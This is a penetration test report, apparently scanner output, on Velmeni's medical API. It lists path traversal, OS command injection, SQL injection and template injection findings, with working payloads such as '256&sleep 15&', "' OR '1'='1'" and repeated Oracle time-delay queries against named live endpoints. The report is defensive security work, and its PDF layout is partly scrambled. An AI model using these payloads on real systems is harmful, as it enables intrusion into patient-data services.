

Fastest Path to Customer Trust with Security Compliance Automation

Web Application API Penetration Test Report



24th Sep 2023

Copyright

The copyright in this work is vested to Akitra Inc. and the document is issued in confidence for the purpose to which it is supplied. If you are not the intended recipient, be aware. Any disclosure, copying or distribution of this document without the prior consent of Akitra Inc. is prohibited. If found so, you will be open to legal actions.

TABLE OF CONTENTS

Executive Summary	4
Recommendation	4
Risk Rating Definitions	4
Application Info	5
Technical Summary	6

Executive Summary

The findings of a penetration test conducted on Velmeni's Web Application on 24th Sep 2023 are summarized in this report. A team of skilled security consultants from Akitra Inc. conducted the test.

A security penetration test is a simulated cyber-attack on a web application. The goal of this test is to identify and exploit vulnerabilities in the system in order to assess the application's security posture. Penetration tests are an important part of a Comprehensive security strategy and can help organizations identify and fix vulnerabilities before they are exploited by attackers.

Recommendation

The analysis is based on the technologies and known threats as of the date of this report. Akitra recommends that all modifications suggested in this document be performed to ensure the overall security of the web application. The High and Medium risk vulnerabilities must be fixed.

Risk Rating Definitions

The final rating of each vulnerability will be a rating of

High	High Risk severity findings are issues which require immediate attention and remediation at high priority.
Medium	Medium Risk severity findings are issues which require attention and remediation.
Low	Low Risk severity findings are issues which have potential to become severe and it is recommended to be remediated before it escalates.
Informational	Informational Risk severity findings are mostly non-complaint for a security best practice

Application Info

Organization	Velmeni
Application Name	Velmeni
URL	https://api.velmeni.ai

Technical Summary

Summary of Alerts

Risk Level	Number of Alerts
High	6
Medium	1
Low	2
Informational	3

Alerts

Name	Risk Level	Number of Instances
Path Traversal	High	1
Remote OS Command Injection	High	1
SQL Injection	High	2
SQL Injection - Oracle - Time Based	High	88
SQL Injection - SQLite	High	575
Server Side Template Injection (Blind)	High	85
Cross-Domain Misconfiguration	Medium	75
Strict-Transport-Security Header Not Set	Low	75
X-Content-Type-Options Header Missing	Low	11
Authentication Request Identified	Informational	1
Re-examine Cache-control Directives	Informational	11
<u>User Agent Fuzzer</u>	Informational	23

Alert Detail

High	Path Traversal
	The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a way that the web site will execute or reveal the contents of arbitrary files anywhere on the web server. Any device that exposes an HTTP-based interface is potentially vulnerable to Path Traversal.
	Most web sites restrict user access to a specific portion of the file-system, typically called the "web document root" or "CGI root" directory. These directories contain the files intended for user access and the executable necessary to drive web application functionality. To access files or execute commands anywhere on the file-system, Path Traversal attacks will utilize the ability of special-characters sequences.

The most basic Path Traversal attack uses the "../" special-character sequence to alter the resource location requested in the URL. Although most popular web servers will prevent this Description technique from escaping the web document root, alternate encodings of the "../" sequence may help bypass the security filters. These method variations include valid and invalid Unicode-encoding ("..%u2216" or "..%c0%af") of the forward slash character, backslash characters ("..\") on Windows-based servers, URL encoded characters "%2e% 2e%2f"), and double URL encoding ("..%255c") of the backslash character. Even if the web server properly restricts Path Traversal attempts in the URL path, a web application itself may still be vulnerable due to improper handling of user-supplied input. This is a common problem of web applications that use template mechanisms or load static text from files. In variations of the attack, the original URL parameter value is substituted with the file name of one of the web application's dynamic scripts. Consequently, the results can reveal source code because the file is interpreted as text instead of an executable script. These techniques often employ additional special characters such as the dot (".") to reveal the listing of the current working directory, or "%00" NULL characters in order to bypass rudimentary file extension checks. **URL** https://api.velmeni.ai/api/velmeni bridge/add image Method **POST** Attack add image Evidence Other Info Instances 1 Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue." For filenames, use stringent allow lists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses, and exclude directory separators such as "/". Use an allow list of allowable file extensions. Warning: if you attempt to cleanse your data, then do so that the end result is not in the form that can be dangerous. A sanitizing mechanism can remove characters such as '.' and '.' which may be required for some exploits. An attacker can try to fool the sanitizing mechanism into "cleaning" data into a dangerous form. Suppose the attacker injects a '.' inside a filename (e.g. "sensi.tiveFile") and the sanitizing mechanism removes the character resulting in the valid filename, "sensitiveFile". If the input data are now assumed to be safe, then the file may be compromised. Inputs should be decoded and canonicalized to the application's current internal representation before being validated. Make sure that your application does not decode the Solution same input twice. Such errors could be used to bypass allow list schemes by introducing dangerous inputs after they have been checked. Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links. Run your code using the lowest privileges that are required to accomplish the necessary

tasks. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need

to run as the database administrator, especially in day-to-day operations.

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by your software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows you to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.

Reference CWE Id

WASC Id

http://projects.webappsec.org/Path-Traversal http://cwe.mitre.org/data/definitions/22.html

<u>22</u>

33

Plugin Id 6

High	Remote OS Command Injection
Description	Attack technique used for unauthorized execution of operating system commands. This attack is possible when an application accepts untrusted input to build operating system commands in an insecure manner involving improper data sanitization, and/or improper calling of external programs.
URL	https://api.velmeni.ai/api/patient/scan/save_doctor_feedback
Method	POST
Attack	256&sleep 15&
Evidence	
Other Info	The scan rule was able to control the timing of the application response by sending [256&sleep 15&] to the operating system running this application
Instances	1
	If at all possible, use library calls rather than external processes to recreate the desired functionality.
	Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by your software.
	OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows you to specify restrictions on file operations.
	This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
	For any data that will be used to generate a command to be executed, keep as much of that data out of external control as possible. For example, in web applications, this may require storing the command locally in the session's state instead of sending it out to the client in a hidden form field.
	Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
	For example, consider using the ESAPI Encoding control or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.
	If you need to use dynamically-generated query strings or commands in spite of the risk, properly quote arguments and escape any special characters within those arguments. The

most conservative approach is to escape or filter all characters that do not pass an extremely strict allow list (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection.

If the program to be executed allows arguments to be specified within an input file or from standard input, then consider using that mode to pass arguments instead of the command line.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Solution

Some languages offer multiple functions that can be used to invoke commands. Where possible, identify any function that invokes a command shell using a single string, and replace it with a function that requires individual arguments. These functions typically perform appropriate quoting and filtering of arguments. For example, in C, the system() function accepts a string that contains the entire command to be executed, whereas execl(), execve(), and others require an array of strings, one for each argument. In Windows, CreateProcess() only accepts one command at a time. In Perl, if system() is provided with an array of arguments, then it will quote each of the arguments.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

When constructing OS command strings, use stringent allow lists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping.

Note that proper output encoding, escaping, and quoting is the most effective solution for preventing OS command injection, although input validation may provide some defense-indepth. This is because it effectively limits what will appear in output. Input validation will not always prevent OS command injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, when invoking a mail program, you might need to allow the subject field to contain otherwise-dangerous inputs like ";" and ">" characters, which would need to be escaped or otherwise handled. In this case, stripping the character might reduce the risk of OS command injection, but it would produce incorrect behavior because the subject field would not be recorded as the user intended. This might seem to be a minor inconvenience, but it could be more important when the program relies on well-structured subject lines in order to pass messages to other components.

Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.

http://cwe.mitre.org/data/definitions/78.html https://owasp.org/www-community/attacks/Command_Injection

Reference

CWE Id WASC Id 78 31

Plugin Id

90020

High	SQL Injection
Description	SQL injection may be possible.
URL	https://api.velmeni.ai/api/patient/scan/save_doctor_feedback
Method	POST
Attack	339' OR '1'='1'
Evidence	
Other Info	The page results were successfully manipulated using the boolean conditions [339' AND '1'='1'] and [339' OR '1'='1'] The parameter value being modified was NOT stripped from the HTML output for the purposes of the comparison Data was NOT returned for the original parameter. The vulnerability was detected by successfully retrieving more data than originally returned, by manipulating the parameter
URL	https://api.velmeni.ai/api/patient/scan/save_doctor_feedback
Method	POST
Attack	10 AND 1=1
Evidence	
Other Info	The page results were successfully manipulated using the boolean conditions [10 AND 1=1] and [10 AND 1=2] The parameter value being modified was stripped from the HTML output for the purposes of the comparison Data was returned for the original parameter. The vulnerability was detected by successfully restricting the data originally returned, by manipulating the parameter
Instances	2
Solution	In general, type check all data on the server side. If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?' If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries. If database Stored Procedures can be used, use them. Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality! Do not create dynamic SQL queries using simple string concatenation. Escape all data received from the client. Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input. Apply the principle of least privilege by using the least privileged database user possible. In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Reference CWE Id WASC Id	Grant the minimum database access that is necessary for the application. https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet. html 89
Plugin Id	19
Plugin Id	40018
High	SQL Injection - Oracle - Time Based

Description

SQL injection may be possible.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

field: [w], value [89' / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.

get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / ']

Evidence

The query time is controllable using parameter value [89' / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / '], which caused the request to take

[11,769] milliseconds, when the original unmodified query with value [89] took [917]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

field: [x], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT

UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

The query time is controllable using parameter value [(SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [10,217] milliseconds, when the original unmodified query with value [344] took [1,832]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

field: [x], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT

UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)]

Evidence

The query time is controllable using parameter value [(SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [6,276] milliseconds, when the original unmodified query with value [846] took [771]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

field: [x], value [(SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT

UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get host name('10.0.0.3') from dual union SELECT UTL_INADDR.get host name

(10.0.0.4) from dual union SELECT UTL INADDR.get host name(10.0.0.5) from dual)]

Evidence

The query time is controllable using parameter value [(SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT

Other Info

Other

Info

MEUIO

Attack

Other

Info

Attack

_ ..

Other Info

UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [6,350] milliseconds, when the original unmodified query with value [178] took [1,136]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

field: [x], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT

UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

Attack

Other

Info

The query time is controllable using parameter value [(SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [6,593] milliseconds, when the original unmodified query with value [192] took [257]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

field: [x], value [(SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT

UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)]

The query time is controllable using parameter value [(SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name

('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [6,742] milliseconds, when the original unmodified query with value [1090] took [1,612]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

field: [x], value [(SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT

UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name ('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)]

The query time is controllable using parameter value [(SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [7,266] milliseconds, when the original unmodified query with value [1274] took [1,190]

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

field: [x], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT

UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)]

The query time is controllable using parameter value [(SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name

('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual

Method

Attack

Evidence

Other Info

Attack

Evidence

Other Info

Attack

Evidence

Other union SELEC

union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [7,390] milliseconds, when the original unmodified query with value [1047] took [2,294]

milliseconds

milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

field: [x], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT

Attack

UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

The query time is controllable using parameter value [(SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [7,457] milliseconds, when the original unmodified query with value [1010] took [1,533]

Other Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

field: [x], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT

Attack

UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

The query time is controllable using parameter value [(SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [7,696] milliseconds, when the original unmodified query with value [746.6039215686274]

Other Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

milliseconds

took [1,821] milliseconds

field: [x], value [(SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT

Attack

UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

The query time is controllable using parameter value [(SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [7,775] milliseconds, when the original unmodified query with value [334] took [1,131]

Other Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

field: [x], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT

UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get host_name

('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

Attack

The query time is controllable using parameter value [(SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [8,175] milliseconds, when the original unmodified query with value [876] took [2,716] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

field: [x], value [(SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT

Attack

UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)]

Evidence

Other

Info

The query time is controllable using parameter value [(SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual)], which caused the request to take [8,415] milliseconds, when the original unmodified query with value [1176] took [1,214]

milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

field: [x], value [1105" / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union

SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR. get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

The query time is controllable using parameter value [1105" / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "], which caused the request to take [5,637] milliseconds, when the original unmodified query with value [1105] took [272]

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

> field: [x], value [1169" / (SELECT UTL INADDR.get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT UTL INADDR.

get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

Attack

The query time is controllable using parameter value [1169" / (SELECT UTL INADDR. get host name('10.0.0.1') from dual union SELECT UTL INADDR.get host name ('10.0.0.2') from dual union SELECT UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR.get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "], which caused the request to take [5,736] milliseconds, when the original unmodified query with value [1169] took [258]

milliseconds

milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

> field: [x], value [1183 and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL INADDR.get host name('10.0.0.2') from dual union SELECT

UTL INADDR.get host name('10.0.0.3') from dual union SELECT UTL INADDR. get host name('10.0.0.4') from dual union SELECT UTL INADDR.get host name

('10.0.0.5') from dual) --]

Evidence

Attack

Other Info

URL

Other Info

The query time is controllable using parameter value [1183 and exists (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) --], which caused the request to take [6,501] milliseconds, when the original unmodified query with value [1183] took [1,098] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [x], value [1227' / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / ']

Evidence

Other

The query time is controllable using parameter value [1227' / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / '], which caused the request to take [8,450] milliseconds, when the original unmodified query with value [1227] took [1,306] milliseconds

URL

Info

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

field: [x], value [1310' / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / ']

Attack

Evidence

Other Info The query time is controllable using parameter value [1310' / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / '], which caused the request to take [7,465] milliseconds, when the original unmodified query with value [1310] took [979] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [x], value [1506" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR. get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual union SELECT UTL_INADDR.get_host_name('10

('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "]

Evidence

Other Info The query time is controllable using parameter value [1506" / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual) / "], which caused the request to take [7,261] milliseconds, when the original unmodified query with value [1506] took [1,043] milliseconds

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [x], value [209 / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)

Evidence

The query time is controllable using parameter value [209 / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [7,664] milliseconds, when the original unmodified query with value [209] took [1,308] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [x], value [212 / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)

Evidence

Other Info The query time is controllable using parameter value [212 / (SELECT UTL_INADDR. get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name ('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.4') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.5') from dual)], which caused the request to take [6,105] milliseconds, when the original unmodified query with value [212] took [768] milliseconds

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

field: [x], value [251" / (SELECT UTL_INADDR.get_host_name('10.0.0.1') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.2') from dual union SELECT UTL_INADDR.get_host_name('10.0.0.3') from dual union SELECT UTL_INADDR.get_host_name

('10.0.0.4') from dual union SELECT UTL INADDR.get host name('10.0.0.5') from dual) / "]

Evidence

